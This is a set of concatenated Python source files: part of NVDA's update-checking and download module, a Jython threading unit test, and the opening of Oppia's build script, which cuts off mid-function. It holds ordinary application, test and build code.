mainSizer.Add(sHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL)
self.Sizer = mainSizer
mainSizer.Fit(self)
self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)
self.Show()
def onInstallButton(self, evt):
executeUpdate()
self.Destroy()
def onDownloadButton(self, evt):
self.Hide()
DonateRequestDialog(gui.mainFrame, self._download)
def _download(self):
UpdateDownloader(self.updateInfo).start()
self.Destroy()
def onLaterButton(self, evt):
state["dontRemindVersion"] = None
saveState()
self.Close()
class UpdateAskInstallDialog(wx.Dialog):
def __init__(self, parent, destPath, version):
self.destPath=destPath
self.version = version
storeUpdatesDirWritable=os.path.isdir(storeUpdatesDir) and os.access(storeUpdatesDir, os.W_OK)
# Translators: The title of the dialog asking the user to Install an NVDA update.
super(UpdateAskInstallDialog, self).__init__(parent, title=_("NVDA Update"))
mainSizer = wx.BoxSizer(wx.VERTICAL)
sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL)
# Translators: A message indicating that an updated version of NVDA is ready to be installed.
sHelper.addItem(wx.StaticText(self, label=_("NVDA version {version} is ready to be installed.\n").format(version=version)))
bHelper = sHelper.addDialogDismissButtons(guiHelper.ButtonHelper(wx.HORIZONTAL))
# Translators: The label of a button to install an NVDA update.
installButton = bHelper.addButton(self, wx.ID_OK, label=_("&Install update"))
installButton.Bind(wx.EVT_BUTTON, self.onInstallButton)
installButton.SetFocus()
if storeUpdatesDirWritable:
# Translators: The label of a button to postpone an NVDA update.
postponeButton = bHelper.addButton(self, wx.ID_CLOSE, label=_("&Postpone update"))
postponeButton.Bind(wx.EVT_BUTTON, self.onPostponeButton)
self.EscapeId = wx.ID_CLOSE
else:
self.EscapeId = wx.ID_OK
mainSizer.Add(sHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL)
self.Sizer = mainSizer
mainSizer.Fit(self)
self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)
def onInstallButton(self, evt):
executeUpdate(self.destPath)
self.EndModal(wx.ID_OK)
def onPostponeButton(self, evt):
finalDest=os.path.join(storeUpdatesDir, os.path.basename(self.destPath))
try:
os.renames(self.destPath, finalDest)
except:
gui.messageBox(
# Translators: The message when a downloaded update file could not be preserved.
_("Unable to postpone update."),
# Translators: The title of the message when a downloaded update file could not be preserved.
_("Error"),
wx.OK | wx.ICON_ERROR)
finalDest=self.destPath
state["pendingUpdateFile"]=finalDest
state["pendingUpdateVersion"]=self.version
# Postponing an update indicates that the user is likely interested in getting a reminder.
# Therefore, clear the dontRemindVersion.
state["dontRemindVersion"] = None
saveState()
self.EndModal(wx.ID_CLOSE)
class UpdateDownloader(object):
"""Download and start installation of an updated version of NVDA, presenting appropriate user interface.
To use, call L{start} on an instance.
"""
def __init__(self, updateInfo):
"""Constructor.
@param updateInfo: update information such as possible URLs, version and the SHA-1 hash of the file as a hex string.
@type updateInfo: dict
"""
self.updateInfo = updateInfo
self.urls = updateInfo["launcherUrl"].split(" ")
self.version = updateInfo["version"]
self.fileHash = updateInfo.get("launcherHash")
self.destPath = tempfile.mktemp(prefix="nvda_update_", suffix=".exe")
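# For illustration only (hypothetical values), updateInfo might look like:
#     {"version": "2019.2",
#      "launcherUrl": "https://mirror1/nvda.exe https://mirror2/nvda.exe",
#      "launcherHash": "<40-character SHA-1 hex digest>"}
# launcherUrl may contain several space-separated mirrors, which is why it
# is split into self.urls above.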
def start(self):
"""Start the download.
"""
self._shouldCancel = False
# Use a timer because timers aren't re-entrant.
self._guiExecTimer = wx.PyTimer(self._guiExecNotify)
gui.mainFrame.prePopup()
# Translators: The title of the dialog displayed while downloading an NVDA update.
self._progressDialog = wx.ProgressDialog(_("Downloading Update"),
# Translators: The progress message indicating that a connection is being established.
_("Connecting"),
# PD_AUTO_HIDE is required because ProgressDialog.Update blocks at 100%
# and waits for the user to press the Close button.
style=wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME | wx.PD_REMAINING_TIME | wx.PD_AUTO_HIDE,
parent=gui.mainFrame)
self._progressDialog.Raise()
t = threading.Thread(target=self._bg)
t.daemon = True
t.start()
def _guiExec(self, func, *args):
self._guiExecFunc = func
self._guiExecArgs = args
if not self._guiExecTimer.IsRunning():
# #6127: Timers must be manipulated from the main thread.
wx.CallAfter(self._guiExecTimer.Start, 50, True)
def _guiExecNotify(self):
self._guiExecFunc(*self._guiExecArgs)
def _bg(self):
success=False
for url in self.urls:
try:
self._download(url)
except:
log.debugWarning("Error downloading %s" % url, exc_info=True)
else: #Successfully downloaded or canceled
if not self._shouldCancel:
success=True
break
else:
# None of the URLs succeeded.
self._guiExec(self._error)
return
if not success:
try:
os.remove(self.destPath)
except OSError:
pass
return
self._guiExec(self._downloadSuccess)
def _download(self, url):
remote = urllib.urlopen(url)
if remote.code != 200:
raise RuntimeError("Download failed with code %d" % remote.code)
# #2352: Some security scanners such as Eset NOD32 HTTP Scanner
# cause huge read delays while downloading.
# Therefore, set a higher timeout.
remote.fp._sock.settimeout(120)
size = int(remote.headers["content-length"])
local = file(self.destPath, "wb")
if self.fileHash:
hasher = hashlib.sha1()
self._guiExec(self._downloadReport, 0, size)
read = 0
chunk=DOWNLOAD_BLOCK_SIZE
while True:
if self._shouldCancel:
return
if size - read < chunk:
chunk = size - read
block = remote.read(chunk)
if not block:
break
read += len(block)
if self._shouldCancel:
return
local.write(block)
if self.fileHash:
hasher.update(block)
self._guiExec(self._downloadReport, read, size)
if read < size:
raise RuntimeError("Content too short")
if self.fileHash and hasher.hexdigest() != self.fileHash:
raise RuntimeError("Content has incorrect file hash")
self._guiExec(self._downloadReport, read, size)
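# A minimal standalone sketch (not used by the downloader itself) of the
# same integrity check performed above, assuming destPath points at a fully
# downloaded file and expectedHash is the SHA-1 hex string from updateInfo:
#
#     hasher = hashlib.sha1()
#     with open(destPath, "rb") as f:
#         for block in iter(lambda: f.read(DOWNLOAD_BLOCK_SIZE), ""):
#             hasher.update(block)
#     if hasher.hexdigest() != expectedHash:
#         raise RuntimeError("Content has incorrect file hash")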
def _downloadReport(self, read, size):
if self._shouldCancel:
return
percent = int(float(read) / size * 100)
# Translators: The progress message indicating that a download is in progress.
cont, skip = self._progressDialog.Update(percent, _("Downloading"))
if not cont:
self._shouldCancel = True
self._stopped()
def _stopped(self):
self._guiExecTimer = None
self._guiExecFunc = None
self._guiExecArgs = None
self._progressDialog.Hide()
self._progressDialog.Destroy()
self._progressDialog = None
# Not sure why, but this doesn't work if we call it directly here.
wx.CallLater(50, gui.mainFrame.postPopup)
def _error(self):
self._stopped()
gui.messageBox(
# Translators: A message indicating that an error occurred while downloading an update to NVDA.
_("Error downloading update."),
_("Error"),
wx.OK | wx.ICON_ERROR)
def _downloadSuccess(self):
self._stopped()
gui.runScriptModalDialog(UpdateAskInstallDialog(gui.mainFrame, self.destPath, self.version))
class DonateRequestDialog(wx.Dialog):
# Translators: The message requesting donations from users.
MESSAGE = _(
"We need your help in order to continue to improve NVDA.\n"
"This project relies primarily on donations and grants. By donating, you are helping to fund full time development.\n"
"If even $10 is donated for every download, we will be able to cover all of the ongoing costs of the project.\n"
"All donations are received by NV Access, the non-profit organisation which develops NVDA.\n"
"Thank you for your support."
)
def __init__(self, parent, continueFunc):
# Translators: The title of the dialog requesting donations from users.
super(DonateRequestDialog, self).__init__(parent, title=_("Please Donate"))
self._continue = continueFunc
mainSizer=wx.BoxSizer(wx.VERTICAL)
item = wx.StaticText(self, label=self.MESSAGE)
mainSizer.Add(item, border=20, flag=wx.LEFT | wx.RIGHT | wx.TOP)
sizer = wx.BoxSizer(wx.HORIZONTAL)
# Translators: The label of the button to donate
# in the "Please Donate" dialog.
item = self.donateButton = wx.Button(self, label=_("&Donate"))
item.Bind(wx.EVT_BUTTON, self.onDonate)
sizer.Add(item)
# Translators: The label of the button to decline donation
# in the "Please Donate" dialog.
item = wx.Button(self, wx.ID_CLOSE, label=_("&Not now"))
item.Bind(wx.EVT_BUTTON, lambda evt: self.Close())
sizer.Add(item)
self.Bind(wx.EVT_CLOSE, self.onClose)
self.EscapeId = wx.ID_CLOSE
mainSizer.Add(sizer, flag=wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, border=20)
self.Sizer = mainSizer
mainSizer.Fit(self)
self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)
self.Show()
def onDonate(self, evt):
os.startfile(gui.DONATE_URL)
# Translators: The label of a button to indicate that the user is finished donating
# in the "Please Donate" dialog.
self.donateButton.Label = _("&Done")
self.donateButton.Bind(wx.EVT_BUTTON, lambda evt: self.Close())
def onClose(self, evt):
self.Hide()
self._continue()
self.Destroy()
def saveState():
try:
cPickle.dump(state, file(_stateFilename, "wb"))
except:
log.debugWarning("Error saving state", exc_info=True)
def initialize():
global state, _stateFilename, autoChecker
_stateFilename = os.path.join(globalVars.appArgs.configPath, "updateCheckState.pickle")
try:
state = cPickle.load(file(_stateFilename, "r"))
except:
log.debugWarning("Couldn't retrieve update state", exc_info=True)
# Defaults.
state = {
"lastCheck": 0,
"dontRemindVersion": None,
"pendingUpdateVersion": None,
"pendingUpdateFile": None,
}
# check the pending version against the current version
# and make sure that pendingUpdateFile and pendingUpdateVersion are part of the state dictionary.
if "pendingUpdateVersion" not in state or state["pendingUpdateVersion"] == versionInfo.version:
state["pendingUpdateFile"] = state["pendingUpdateVersion"] = None
# remove all update files except the one that is currently pending (if any)
try:
for fileName in os.listdir(storeUpdatesDir):
f=os.path.join(storeUpdatesDir, fileName)
if f != state["pendingUpdateFile"]:
os.remove(f)
log.debug("Update file %s removed"%f)
except OSError:
log.warning("Unable to remove old update file %s"%f, exc_info=True)
if not globalVars.appArgs.launcher and (config.conf["update"]["autoCheck"] or (config.conf["update"]["startupNotification"] and isPendingUpdate())):
autoChecker = AutoUpdateChecker()
def terminate():
global state, autoChecker
state = None
if autoChecker:
autoChecker.terminate()
autoChecker = None
# These structs are only complete enough to achieve what we need.
class CERT_USAGE_MATCH(ctypes.Structure):
_fields_ = (
("dwType", ctypes.wintypes.DWORD),
# CERT_ENHKEY_USAGE struct
("cUsageIdentifier", ctypes.wintypes.DWORD),
("rgpszUsageIdentifier", ctypes.c_void_p), # LPSTR *
)
class CERT_CHAIN_PARA(ctypes.Structure):
_fields_ = (
("cbSize", ctypes.wintypes.DWORD),
("RequestedUsage", CERT_USAGE_MATCH),
("RequestedIssuancePolicy", CERT_USAGE_MATCH),
("dwUrlRetrievalTimeout", ctypes.wintypes.DWORD),
("fCheckRevocationFreshnessTime", ctypes.wintypes.BOOL),
("dwRevocationFreshnessTime", ctypes.wintypes.DWORD),
("pftCacheResync", ctypes.c_void_p), # LPFILETIME
("pStrongSignPara", ctypes.c_void_p), # PCCERT_STRONG_SIGN_PARA
("dwStrongSignFlags", ctypes.wintypes.DWORD),
)
def _updateWindowsRootCertificates():
crypt = ctypes.windll.crypt32
# Get the server certificate.
sslCont = ssl._create_unverified_context()
u = urllib.urlopen("https://www.nvaccess.org/nvdaUpdateCheck", context=sslCont)
cert = u.fp._sock.getpeercert(True)
u.close()
# Convert to a form usable by Windows.
certCont = crypt.CertCreateCertificateContext(
0x00000001, # X509_ASN_ENCODING
cert,
len(cert))
# Ask Windows to build a certificate chain, thus triggering a root certificate update.
chainCont = ctypes.c_void_p()
crypt.CertGetCertificateChain(None, certCont, None, None,
ctypes.byref(CERT_CHAIN_PARA(cbSize=ctypes.sizeof(CERT_CHAIN_PARA),
RequestedUsage=CERT_USAGE_MATCH())),
0, None,
ctypes.byref(chainCont))
crypt.CertFreeCertificateChain(chainCont)
crypt.CertFreeCertificateContext(certCont)
|
test_threading_jy.py | """Misc threading module tests
Made for Jython.
"""
from __future__ import with_statement
import random
import subprocess
import sys
import threading
import time
import unittest
from subprocess import PIPE, Popen
from test import test_support
from threading import Condition, Lock, Thread
from java.lang import Thread as JThread, InterruptedException
class ThreadingTestCase(unittest.TestCase):
def test_str_name(self):
t = Thread(name=1)
self.assertEqual(t.getName(), '1')
t.setName(2)
self.assertEqual(t.getName(), '2')
# make sure activeCount() gets decremented (see issue 1348)
def test_activeCount(self):
activeBefore = threading.activeCount()
activeCount = 10
for i in range(activeCount):
t = Thread(target=self._sleep, args=(i,))
t.setDaemon(0)
t.start()
polls = activeCount
while activeCount > activeBefore and polls > 0:
time.sleep(1)
activeCount = threading.activeCount()
polls -= 1
self.assertTrue(activeCount <= activeBefore, 'activeCount should be <= %s, instead of %s' % (activeBefore, activeCount))
def _sleep(self, n):
time.sleep(random.random())
def test_issue1988(self):
cond = threading.Condition(threading.Lock())
locked = False
try:
locked = cond.acquire(False)
finally:
if locked:
cond.release()
class TwistedTestCase(unittest.TestCase):
def test_needs_underscored_versions(self):
self.assertEqual(threading.Lock, threading._Lock)
self.assertEqual(threading.RLock, threading._RLock)
class JavaIntegrationTestCase(unittest.TestCase):
"""Verifies that Thread.__tojava__ correctly gets the underlying Java thread"""
def test_interruptible(self):
def wait_until_interrupted(cv):
name = threading.currentThread().getName()
with cv:
while not JThread.currentThread().isInterrupted():
try:
cv.wait()
except InterruptedException, e:
break
num_threads = 5
unfair_condition = Condition()
threads = [
Thread(
name="thread #%d" % i,
target=wait_until_interrupted,
args=(unfair_condition,))
for i in xrange(num_threads)]
for thread in threads:
thread.start()
time.sleep(0.1)
for thread in threads:
JThread.interrupt(thread)
joined_threads = 0
for thread in threads:
thread.join(1.) # timeout just in case so we don't stall regrtest
joined_threads += 1
self.assertEqual(joined_threads, num_threads)
class MemoryLeakTestCase(unittest.TestCase):
def test_socket_server(self):
# run socketserver with a small amount of memory; verify it exits cleanly
rc = subprocess.call([sys.executable,
"-J-Xmx32m",
test_support.findfile("socketserver_test.py")])
# stdout=PIPE)
self.assertEquals(rc, 0)
def test_main():
test_support.run_unittest(
JavaIntegrationTestCase,
MemoryLeakTestCase,
ThreadingTestCase,
TwistedTestCase)
if __name__ == "__main__":
test_main()
|
build.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This JSON file contains a JSON object. The object's keys are file paths and
# the values are the corresponding hash values. The paths need to be in posix
# style, as they are interpreted by the `url-interpolation` service, which
# treats the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to the build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts')
# Files with these name patterns shouldn't be moved to the build directory,
# and will not be served in production. (This includes protractor.js files
# in /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain a
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files, or should not be moved to the build directory.
# Statically served pages from app.yaml should be here too, since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*'
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/playbook.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
if deploy_mode:
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build
# process is being run from the deploy script.
content = content.replace('version: default', '')
# The FIREBASE_AUTH_EMULATOR_HOST environment variable is only needed to
# test locally, and MUST NOT be included in the deployed file.
content = re.sub(' FIREBASE_AUTH_EMULATOR_HOST: ".*"\n', '', content)
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
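# For illustration: with the defaults, a path such as
# 'webpack_bundles/about-page.mainpage.html' from PAGES_IN_APP_YAML is
# rewritten to 'build/webpack_bundles/about-page.mainpage.html'; in
# maintenance mode every listed page is pointed at the maintenance page
# instead.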
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
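# A minimal sketch of the replacements performed above: with prod_env=True,
# the line '"DEV_MODE": true' in constants.ts becomes '"DEV_MODE": false',
# and ENABLE_MAINTENANCE_MODE in feconf.py is set to True or False to match
# maintenance_mode.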
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
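# For illustration (hypothetical hash): _insert_hash('css/oppia.css',
# '240933e7564bd72a4dde42ee23260c5f') returns
# 'css/oppia.240933e7564bd72a4dde42ee23260c5f.css'.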
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
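# A minimal sketch of the whitespace collapsing above, using the REMOVE_WS
# pattern (r'\s{2,}') defined near the top of this file:
#
#     REMOVE_WS(' ', 'a  b\n\n  c')  # -> 'a b c'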
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
